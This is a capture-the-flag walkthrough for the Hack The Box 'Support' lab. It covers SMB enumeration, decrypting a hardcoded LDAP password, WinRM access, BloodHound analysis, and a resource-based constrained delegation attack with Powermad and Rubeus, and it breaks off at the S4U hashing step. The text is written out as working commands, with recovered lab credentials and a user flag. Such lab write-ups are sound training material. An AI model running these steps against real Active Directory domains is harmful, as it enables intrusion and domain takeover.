Support

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Run a nmap scan

nmap -sC -sV -Pn -v 10.129.233.185

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-10 19:16:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-10T19:16:58
|_  start_date: N/A

nmap -sC -sV -Pn -v -p- -T4 --min-rate=1000 10.129.233.185

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-11 08:53:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
64625/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-time: 
|   date: 2024-12-11T08:54:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

The Nmap scan reveals numerous open ports, indicating that the underlying operating system is likely Windows. Among the open ports, the most notable ones are 389 (LDAP), 636 (LDAPS), 445 (SMB), and 5985 (WinRM). Since no web server is running on any of the detected ports and this appears to be a Windows system, we’ll proceed to check for any accessible SMB shares.

└─$ smbclient -L //10.129.233.185        
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
<SNIP>

Among the available shares, support-tools stands out as it is not a default share. Let’s try connecting to it and listing the files it contains.

└─$ smbclient //10.129.233.185/support-tools 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

We successfully connected to the share anonymously and listed its contents. The share includes several application installers, such as PuTTY and Wireshark, but one file stands out: UserInfo.exe.zip. This doesn’t appear to be a well-known application. Let’s download it locally for further investigation.

smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (267.5 KiloBytes/sec) (average 267.5 KiloBytes/sec)

Once the archive has been downloaded, disconnect from the SMB share and extract its contents by unzipping the file.

└─$ unzip UserInfo.exe.zip 
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe            
  inflating: CommandLineParser.dll   
  inflating: Microsoft.Bcl.AsyncInterfaces.dll  
  inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll  
  inflating: Microsoft.Extensions.DependencyInjection.dll  
  inflating: Microsoft.Extensions.Logging.Abstractions.dll  
  inflating: System.Buffers.dll      
  inflating: System.Memory.dll       
  inflating: System.Numerics.Vectors.dll  
  inflating: System.Runtime.CompilerServices.Unsafe.dll  
  inflating: System.Threading.Tasks.Extensions.dll  
  inflating: UserInfo.exe.config

The archive contains several DLL files along with an executable named UserInfo.exe. Checking the file type reveals that it is a .NET executable. Since we are working on a Linux system, we have two options: decompiling the executable to analyse its functionality or using Wine to attempt running it.

└─$ file UserInfo.exe       
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

ILSpy

To decompile the .NET executable, we can use Avalonia ILSpy, a cross-platform version of ILSpy compatible with Linux. You can download the latest release from the AvaloniaILSpy Releases page.

wget https://github.com/icsharpcode/AvaloniaILSpy/releases/download/v7.2-rc/Linux.x64.Release.zip

Then we will have to extract the contents using unzip.

unzip Linux.x64.Release.zip

The archive will extract a second archive, which we must again unzip.

unzip ILSpy-linux-x64-Release.zip

Once the archive is extracted, navigate to the artifacts/linux-arm64 folder and run the ILSpy executable. Use the following commands:

cd artifacts/linux-x64
sudo ./ILSpy

Let’s load the UserInfo.exe file to decompile it. Go to File, choose Open, locate the target binary in the file browser, and select it.

Once the binary is imported, ILSpy will automatically handle the decompilation, allowing us to view the source code. Upon reviewing the code, we quickly notice a function named LdapQuery alongside two other functions called FindUser and GetUser.

public LdapQuery()
	{
		string password = Protected.getPassword();
		entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
		entry.set_AuthenticationType((AuthenticationTypes)1);
		ds = new DirectorySearcher(entry);
	}

The code reveals that the binary connects to a remote LDAP server to retrieve user information. To proceed, we’ll add support.htb to our hosts file.

echo '10.129.233.185 support.htb' | sudo tee -a /etc/hosts

The password required to authenticate with the LDAP server is retrieved from the Protected.getPassword() function.

The code for this function is:

internal class Protected
{
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

	private static byte[] key = Encoding.ASCII.GetBytes("armando");

	public static string getPassword()
	{
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		for (int i = 0; i < array.Length; i++)
		{
			array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
		}
		return Encoding.Default.GetString(array2);
	}
}

The password appears to be encrypted using XOR, and the decryption process is as follows:

The enc_password string is Base64-decoded and stored in a byte array named array.
A second byte array, array2, is created with the same values as array.
A loop is initiated to iterate through each character in array. Each character is XORed with a letter from the key and then with the byte 0xDFu (223).
Once the loop completes, the decrypted password is returned.

Let's create a Python script that performs the decryption process.

import base64
from itertools import cycle

# Base64 encoded encrypted password
enc_password = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E")

# Key and additional XOR value
key = b"armando"
key2 = 223

# Initialize result string
res = ''

# Decrypt using XOR with key and key2
for e, k in zip(enc_password, cycle(key)):
    res += chr(e ^ k ^ key2)

# Print the decrypted password
print(res)

Save the above code into decrypt.py and run it.

└─$ python3 decrypt.py  
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

The script successfully prints the decrypted password, allowing us to proceed with connecting to the LDAP server to gather further information.

Wine

Another way to examine the functionality of UserInfo.exe is by using Wine, a tool that enables Windows applications to run on Linux systems. This allows us to execute the program directly and observe its behaviour.

└─$ wine UserInfo.exe                                                      

Usage: UserInfo.exe [options] [commands]

Options:
  -v|--verbose        Verbose output

Commands:
  find                Find a user
  user                Get information about a user

Running the binary with Wine displays its command-line usage. Let’s try using the find flag to explore its functionality.

└─$ wine UserInfo.exe -v find
[-] At least one of -first or -last is required.

The program indicates that a -first or -last flag is also required. Let’s include one.

└─$ wine UserInfo.exe -v find -first "test"
[*] LDAP query to use: (givenName=test)
[-] Exception: No Such Object

Note: If we haven’t already added support.htb to our hosts file, the binary will throw a "Connect error" message. There are several methods to identify or even guess the hostname without using ILSpy, such as using Wireshark or running the strings command on Windows.

The binary appears to have successfully connected to the remote LDAP server and displays the LDAP query being executed. However, the test object is not found. A few additional attempts to locate other objects are also unsuccessful.

We could try injecting an LDAP query to list all objects, but this approach also fails.

└─$ wine UserInfo.exe -v find -first "*"   
[*] LDAP query to use: (givenName=*)
[-] Exception: No Such Object

Note: The binary is, in fact, vulnerable to LDAP query injection, but this only works on a Windows system.

The earlier failures might stem from Wine being imperfect software, causing the binary to fail during execution, preventing it from identifying the names correctly. However, we know the binary is connecting to the remote LDAP server on the target machine and successfully authenticating.

To investigate further, let’s launch Wireshark to capture the network traffic and attempt to extract the username and password used for authentication. Start Wireshark and begin capturing packets on the tun0 interface. Then, rerun the binary with Wine as demonstrated earlier.

The LDAP authentication details are successfully captured in Wireshark. By examining the bindRequest packet, we can view the username and password combination being used.

To do this, navigate to Lightweight Directory Access Protocol in the packet details, expand protocolOp, and then open bindRequest to identify the username, which is support\ldap. Finally, expand the authentication field to reveal the password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Foothold

With the credentials acquired, let's connect to the LDAP server to explore for any potentially interesting information. We'll use the ldapsearch utility to connect, so let's begin by installing it.

sudo apt install ldap-utils

Once the utility is installed, we'll attempt to bind to the LDAP server using ldap@support.htb as the BindDN with the -D flag, and specify support and htb as the Domain Components using the -b flag.

└─$ ldapsearch -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" "(cn=Administrator)"
=htb" "(cn=Administrator)" 
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (cn=Administrator)
# requesting: ALL
#

# Administrator, Users, support.htb
dn: CN=Administrator,CN=Users,DC=support,DC=htb
<SNIP>

└─$ ldapsearch -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" "(objectclass=*)"

# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# support.htb
dn: DC=support,DC=htb
<SNIP>
# Users, support.htb
dn: CN=Users,DC=support,DC=htb
<SNIP>
# Computers, support.htb
dn: CN=Computers,DC=support,DC=htb
<SNIP>

When connecting to an LDAP server, the BindDN can be thought of as a type of username or account used to establish the connection, granting the necessary permissions to view and modify objects within the LDAP directory.

The Domain Components, on the other hand, function like a directory structure in LDAP. They are read from right to left and guide the server on where to look and which objects to retrieve. In this example, the server was directed to navigate to the htb domain component, locate the support domain component, and then search for any objects within it named Administrator.

The command produced a large amount of data, indicating that the connection was successful.

Apache Directory Studio

Instead of using ldapsearch, you can opt for the Apache Directory Studio application, which can be downloaded from here. This tool offers a graphical interface, making it easier to view LDAP data efficiently. Simply download it to your device and run the application.

Extract the tar archive, change into ApacheDirectoryStudio and start the Apache directory Studio

tar -xvzf ApacheDirectoryStudio-2.0.0.v20210717-M17-linux.gtk.x86_64.tar.gz
cd ApacheDirectoryStudio
sudo ./ApacheDirectoryStudio

Next, add a connection to the LDAP server by selecting the LDAP button located at the top left of the screen.

On the new page, right-click anywhere within the Connections window and choose New Connection.

Enter Support as the connection name, support.htb as the hostname, and then click Next.

In the following window, select Simple Authentication as the authentication method. Set the Bind DN to ldap@support.htb and enter the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz in the Bind password field. Click the Check Authentication button to verify that everything is working correctly.

If the authentication is successful, click OK and then select Finish.

On the home screen of the Apache Directory Studio utility, you'll find the Support connection in the bottom left corner. Double-clicking it will establish a connection to the remote LDAP server and display all the LDAP objects.

After opening DC=support,DC=htb, you will notice an object with the Common Name of users. This object contains all the system users on the remote machine. Open it to continue enumerating further.

Among the users listed, one stands out: support. Examining this user's properties reveals a non-default tag called info with the value Ironside47pleasure40Watchful, which resembles a password. Additionally, this user is a member of the Remote Management Users group, granting them permission to connect via WinRM.

With this information, let's use evil-winrm to attempt a remote connection to the support user using the identified password.

└─$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

The connection is successful, and the user flag can be located in C:\Users\Support\Desktop.

*Evil-WinRM* PS C:\Users\support\Desktop> ls


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        12/10/2024  11:14 AM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
f7ed57ac4a618b59b103f5adf6ff9f29
*Evil-WinRM* PS C:\Users\support\Desktop> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc
   Primary Dns Suffix  . . . . . . . : support.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : support.htb
                                       .htb

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-B9-AA-23
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.129.235.164(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Tuesday, December 10, 2024 11:13:37 AM
   Lease Expires . . . . . . . . . . : Tuesday, December 10, 2024 5:13:37 PM
   Default Gateway . . . . . . . . . : 10.10.10.2
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Privilege Escalation

The Nmap output has already shown us that the machine is part of a Domain. We can gather more details about the domain using the Active Directory PowerShell module, which is typically pre-installed on Domain Controllers.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-ADDomain

AllowedDNSSuffixes                 : {}
ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=support,DC=htb
DeletedObjectsContainer            : CN=Deleted Objects,DC=support,DC=htb
DistinguishedName                  : DC=support,DC=htb
DNSRoot                            : support.htb
DomainControllersContainer         : OU=Domain Controllers,DC=support,DC=htb
DomainMode                         : Windows2016Domain
DomainSID                          : S-1-5-21-1677581083-3380853377-188903654
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=support,DC=htb
Forest                             : support.htb
InfrastructureMaster               : dc.support.htb
LastLogonReplicationInterval       :
LinkedGroupPolicyObjects           : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=support,DC=htb}
LostAndFoundContainer              : CN=LostAndFound,DC=support,DC=htb
ManagedBy                          :
Name                               : support
NetBIOSName                        : SUPPORT
ObjectClass                        : domainDNS
ObjectGUID                         : 553cd9a3-86c4-4d64-9e85-5146a98c868e
ParentDomain                       :
PDCEmulator                        : dc.support.htb
PublicKeyRequiredPasswordRolling   : True
QuotasContainer                    : CN=NTDS Quotas,DC=support,DC=htb
ReadOnlyReplicaDirectoryServers    : {}
ReplicaDirectoryServers            : {dc.support.htb}
RIDMaster                          : dc.support.htb
SubordinateReferences              : {DC=ForestDnsZones,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb, CN=Configuration,DC=support,DC=htb}
SystemsContainer                   : CN=System,DC=support,DC=htb
UsersContainer                     : CN=Users,DC=support,DC=htb

The machine is indeed the Domain Controller (dc.support.htb) for the support.htb domain. Let’s add this hostname to our hosts file.

echo '10.129.233.185 dc.support.htb' | sudo tee -a /etc/hosts

We can also verify whether the current user belongs to any notable or potentially interesting groups.

*Evil-WinRM* PS C:\Users\support\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts            Group            S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

The support user appears to be a member of a non-default group called Shared Support Accounts, in addition to the Authenticated Users group. To identify potential attack paths within this domain that could help escalate privileges, we can use BloodHound.

First, let’s start the Neo4j database, which is a prerequisite for BloodHound.

sudo neo4j start

Next, start the bloodhound.

bloodhound

We’ll use the SharpHound.exe binary to gather Active Directory data. This binary is part of the BloodHound project and is located in the BloodHound/Collectors/ directory.

To proceed, we can upload the binary using the previously established Evil-WinRM session.

*Evil-WinRM* PS C:\Users\support\Documents> upload SharpHound.exe
                                        
Info: Uploading /home/kali/Tools/SharpHound.exe to C:\Users\support\Documents\SharpHound.exe
                                        
Data: 1402880 bytes of 1402880 bytes copied
                                        
Info: Upload successful!

Once the binary has been uploaded, we can proceed to execute it. This will begin the process of collecting Active Directory data for analysis in BloodHound.

*Evil-WinRM* PS C:\Users\support\Documents> .\SharpHound.exe
2024-12-10T19:55:01.0889980-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-12-10T19:55:01.2608106-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-10T19:55:01.2927368-08:00|INFORMATION|Initializing SharpHound at 7:55 PM on 12/10/2024
2024-12-10T19:55:01.5576793-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for support.htb : dc.support.htb
2024-12-10T19:55:01.7139588-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-10T19:55:02.0108287-08:00|INFORMATION|Beginning LDAP search for support.htb
2024-12-10T19:55:02.0889288-08:00|INFORMATION|Producer has finished, closing LDAP channel
2024-12-10T19:55:02.0889288-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-12-10T19:55:32.4014671-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-12-10T19:55:46.8076678-08:00|INFORMATION|Consumers finished, closing output channel
2024-12-10T19:55:46.8701700-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-12-10T19:55:47.1670478-08:00|INFORMATION|Status: 108 objects finished (+108 2.4)/s -- Using 44 MB RAM
2024-12-10T19:55:47.1670478-08:00|INFORMATION|Enumeration finished in 00:00:45.1591069
2024-12-10T19:55:47.2607988-08:00|INFORMATION|Saving cache with stats: 67 ID to type mappings.
 67 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-12-10T19:55:47.2764187-08:00|INFORMATION|SharpHound Enumeration Completed at 7:55 PM on 12/10/2024! Happy Graphing!

After execution is complete, a ZIP file containing the collected Active Directory data will be generated in the same directory. This file can be used for further analysis in BloodHound.

*Evil-WinRM* PS C:\Users\support\Documents> ls


    Directory: C:\Users\support\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/10/2024   7:55 PM          12345 20241210195546_BloodHound.zip
-a----        12/10/2024   7:53 PM        1052160 SharpHound.exe
-a----        12/10/2024   7:55 PM          10022 YzgyNDA2MjMtMDk1ZC00MGYxLTk3ZjUtMmYzM2MzYzVlOWFi.bin

The ZIP file contains all the gathered Active Directory data. Let’s download it using the Evil-WinRM session for further analysis in BloodHound.

*Evil-WinRM* PS C:\Users\support\Documents> download 20241210195546_BloodHound.zip
                                        
Info: Downloading C:\Users\support\Documents\20241210195546_BloodHound.zip to 20241210195546_BloodHound.zip
                                        
Info: Download successful!

After downloading the ZIP file, simply drag and drop it into the BloodHound window to load the collected data. Once the data is loaded, search for SUPPORT@SUPPORT.HTB in the top-left search bar to locate the current user. Right-click on the user object and select Mark User as Owned to indicate that we already have access to the system as this user.

The user details will be visible in the top-left corner, just below the search bar, once the user is selected.

The overview includes details about the user’s group memberships, objects in the domain that the user controls, and other critical information. Notably, the Group Delegated Object Control section displays a value of 1, indicating that one of the groups our user is a member of has access to control certain objects in the domain. Let’s click on this section to view more details.

The output confirms that the Shared Support Accounts group has GenericAll privileges on the Domain Controller. Since the support user is a member of this group, they also inherit full privileges on the DC.

By right-clicking on the GenericAll line and selecting Help, we can access additional information about this privilege, including guidance on how to exploit it effectively.

BloodHound indicates that, due to the GenericAll privilege, it is possible to perform a Resource-Based Constrained Delegation (RBCD) attack. This attack can be leveraged to escalate our privileges within the domain.

Resource-Based Constrained Delegation (RBCD)

In summary, an RBCD attack allows us to add a computer under our control to the domain (e.g., $FAKE-COMP01) and configure the Domain Controller (DC) to allow this computer to act on its behalf. By impersonating the DC, we can request Kerberos tickets for $FAKE-COMP01 with the ability to impersonate a highly privileged user in the domain, such as the Administrator. Using these Kerberos tickets, we can execute a Pass the Ticket (PtT) attack to authenticate as the privileged user, gaining full control over the domain.

Prerequisites for the attack:

A shell or code execution as a domain user belonging to the Authenticated Users group. By default, members of this group can add up to 10 computers to the domain.
The ms-ds-machineaccountquota attribute must be greater than 0. This attribute determines how many computers an authenticated domain user can add to the domain.
The current user (or a group the user belongs to) must have WRITE privileges (GenericAll or WriteDACL) over a domain-joined computer (in this case, the Domain Controller).

From enumeration:

The support user belongs to both the Authenticated Users group and the Shared Support Accounts group.
The Shared Support Accounts group has GenericAll privileges over the Domain Controller (dc.support.htb).

Next, let’s check the value of the ms-ds-machineaccountquota attribute to ensure we can proceed with the attack.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties "ms-DS-MachineAccountQuota"



DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

The result of the previous command indicates that this attribute is set to 10, allowing each authenticated domain user to join up to 10 computers to the domain.

Next, we’ll confirm that the msds-allowedtoactonbehalfofotheridentity attribute is empty. To achieve this, we’ll need the PowerView module for PowerShell. This can be uploaded to the server using Evil-WinRM, as demonstrated earlier. Once uploaded, we can import the module using the following command.

*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
<SNIP>                                        
*Evil-WinRM* PS C:\Users\support\Documents> powershell -ep bypass
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1

After importing the module, we can use the Get-DomainComputer cmdlet to retrieve the necessary information.

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

The value is empty, indicating that we are ready to proceed with the RBCD attack. However, before starting, we need to upload the necessary tools. These include PowerMad and Rubeus, which can be uploaded using Evil-WinRM as demonstrated earlier. PowerMad can then be imported with the following command.

*Evil-WinRM* PS C:\Users\support\Documents> upload Powermad.ps1
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> upload Rubeus.exe
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1

Creating a Computer Object

Now, let’s create a fake computer and add it to the domain using PowerMad's New-MachineAccount cmdlet.

*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP01 added

The command successfully added a machine named FAKE-COMP01 to the domain with the password Password123. We can confirm the addition of this new machine using the following command.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP01


DistinguishedName : CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP01.support.htb
Enabled           : True
Name              : FAKE-COMP01
ObjectClass       : computer
ObjectGUID        : 96ccb0ab-874b-4a52-954f-c807ff618204
SamAccountName    : FAKE-COMP01$
SID               : S-1-5-21-1677581083-3380853377-188903654-6101
UserPrincipalName :

The output displays the details of FAKE-COMP01, including the assigned SID value, which is clearly visible.

Configuring RBCD

Next, we need to configure Resource-Based Constrained Delegation (RBCD). This can be done in one of two ways:

Use the built-in PowerShell Active Directory module to set the PrincipalsAllowedToDelegateToAccount value to FAKE-COMP01. This will automatically configure the msds-allowedtoactonbehalfofotheridentity attribute.
Alternatively, use the PowerView module to directly set the msds-allowedtoactonbehalfofotheridentity attribute.

For this walkthrough, we’ll use the first method as it is simpler to understand. We’ll use the Set-ADComputer command to configure RBCD.

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$

To confirm that the command was successful, we can use the Get-ADComputer command.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

As shown, the PrincipalsAllowedToDelegateToAccount is now set to FAKE-COMP01, confirming that the command worked. We can also verify the value of the msds-allowedtoactonbehalfofotheridentity attribute to ensure it has been correctly configured.

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

As observed, the msds-allowedtoactonbehalfofotheridentity attribute now contains a value. However, since this attribute is of type Raw Security Descriptor, we need to convert the bytes into a readable string format to interpret it.

To start, let’s extract the value and store it in a variable named RawBytes.

*Evil-WinRM* PS C:\Users\support\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity

Next, we’ll convert the bytes stored in RawBytes into a Raw Security Descriptor object for easier interpretation.

*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0

Finally, we can display the entire security descriptor, along with the DiscretionaryAcl class. The DiscretionaryAcl represents the Access Control List (ACL) that defines which machines are allowed to act on behalf of the domain controller.

*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor


ControlFlags           : DiscretionaryAclPresent, SelfRelative
Owner                  : S-1-5-32-544
Group                  :
SystemAcl              :
DiscretionaryAcl       : {System.Security.AccessControl.CommonAce}
ResourceManagerControl : 0
BinaryLength           : 80



*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor.DiscretionaryAcl


BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-6101
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

From the output, we can confirm that the SecurityIdentifier matches the SID of FAKE-COMP01 observed earlier, and the AceType is set to AccessAllowed.

Performing a S4U Attack

We are now ready to carry out the S4U attack, which will enable us to obtain a Kerberos ticket on behalf of the Administrator. To execute this attack, we will use Rubeus.

The first step is to obtain the hash of the password that was used to create the computer object.

\*Evil-WinRM* PS C:\Users\support\Documents>.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
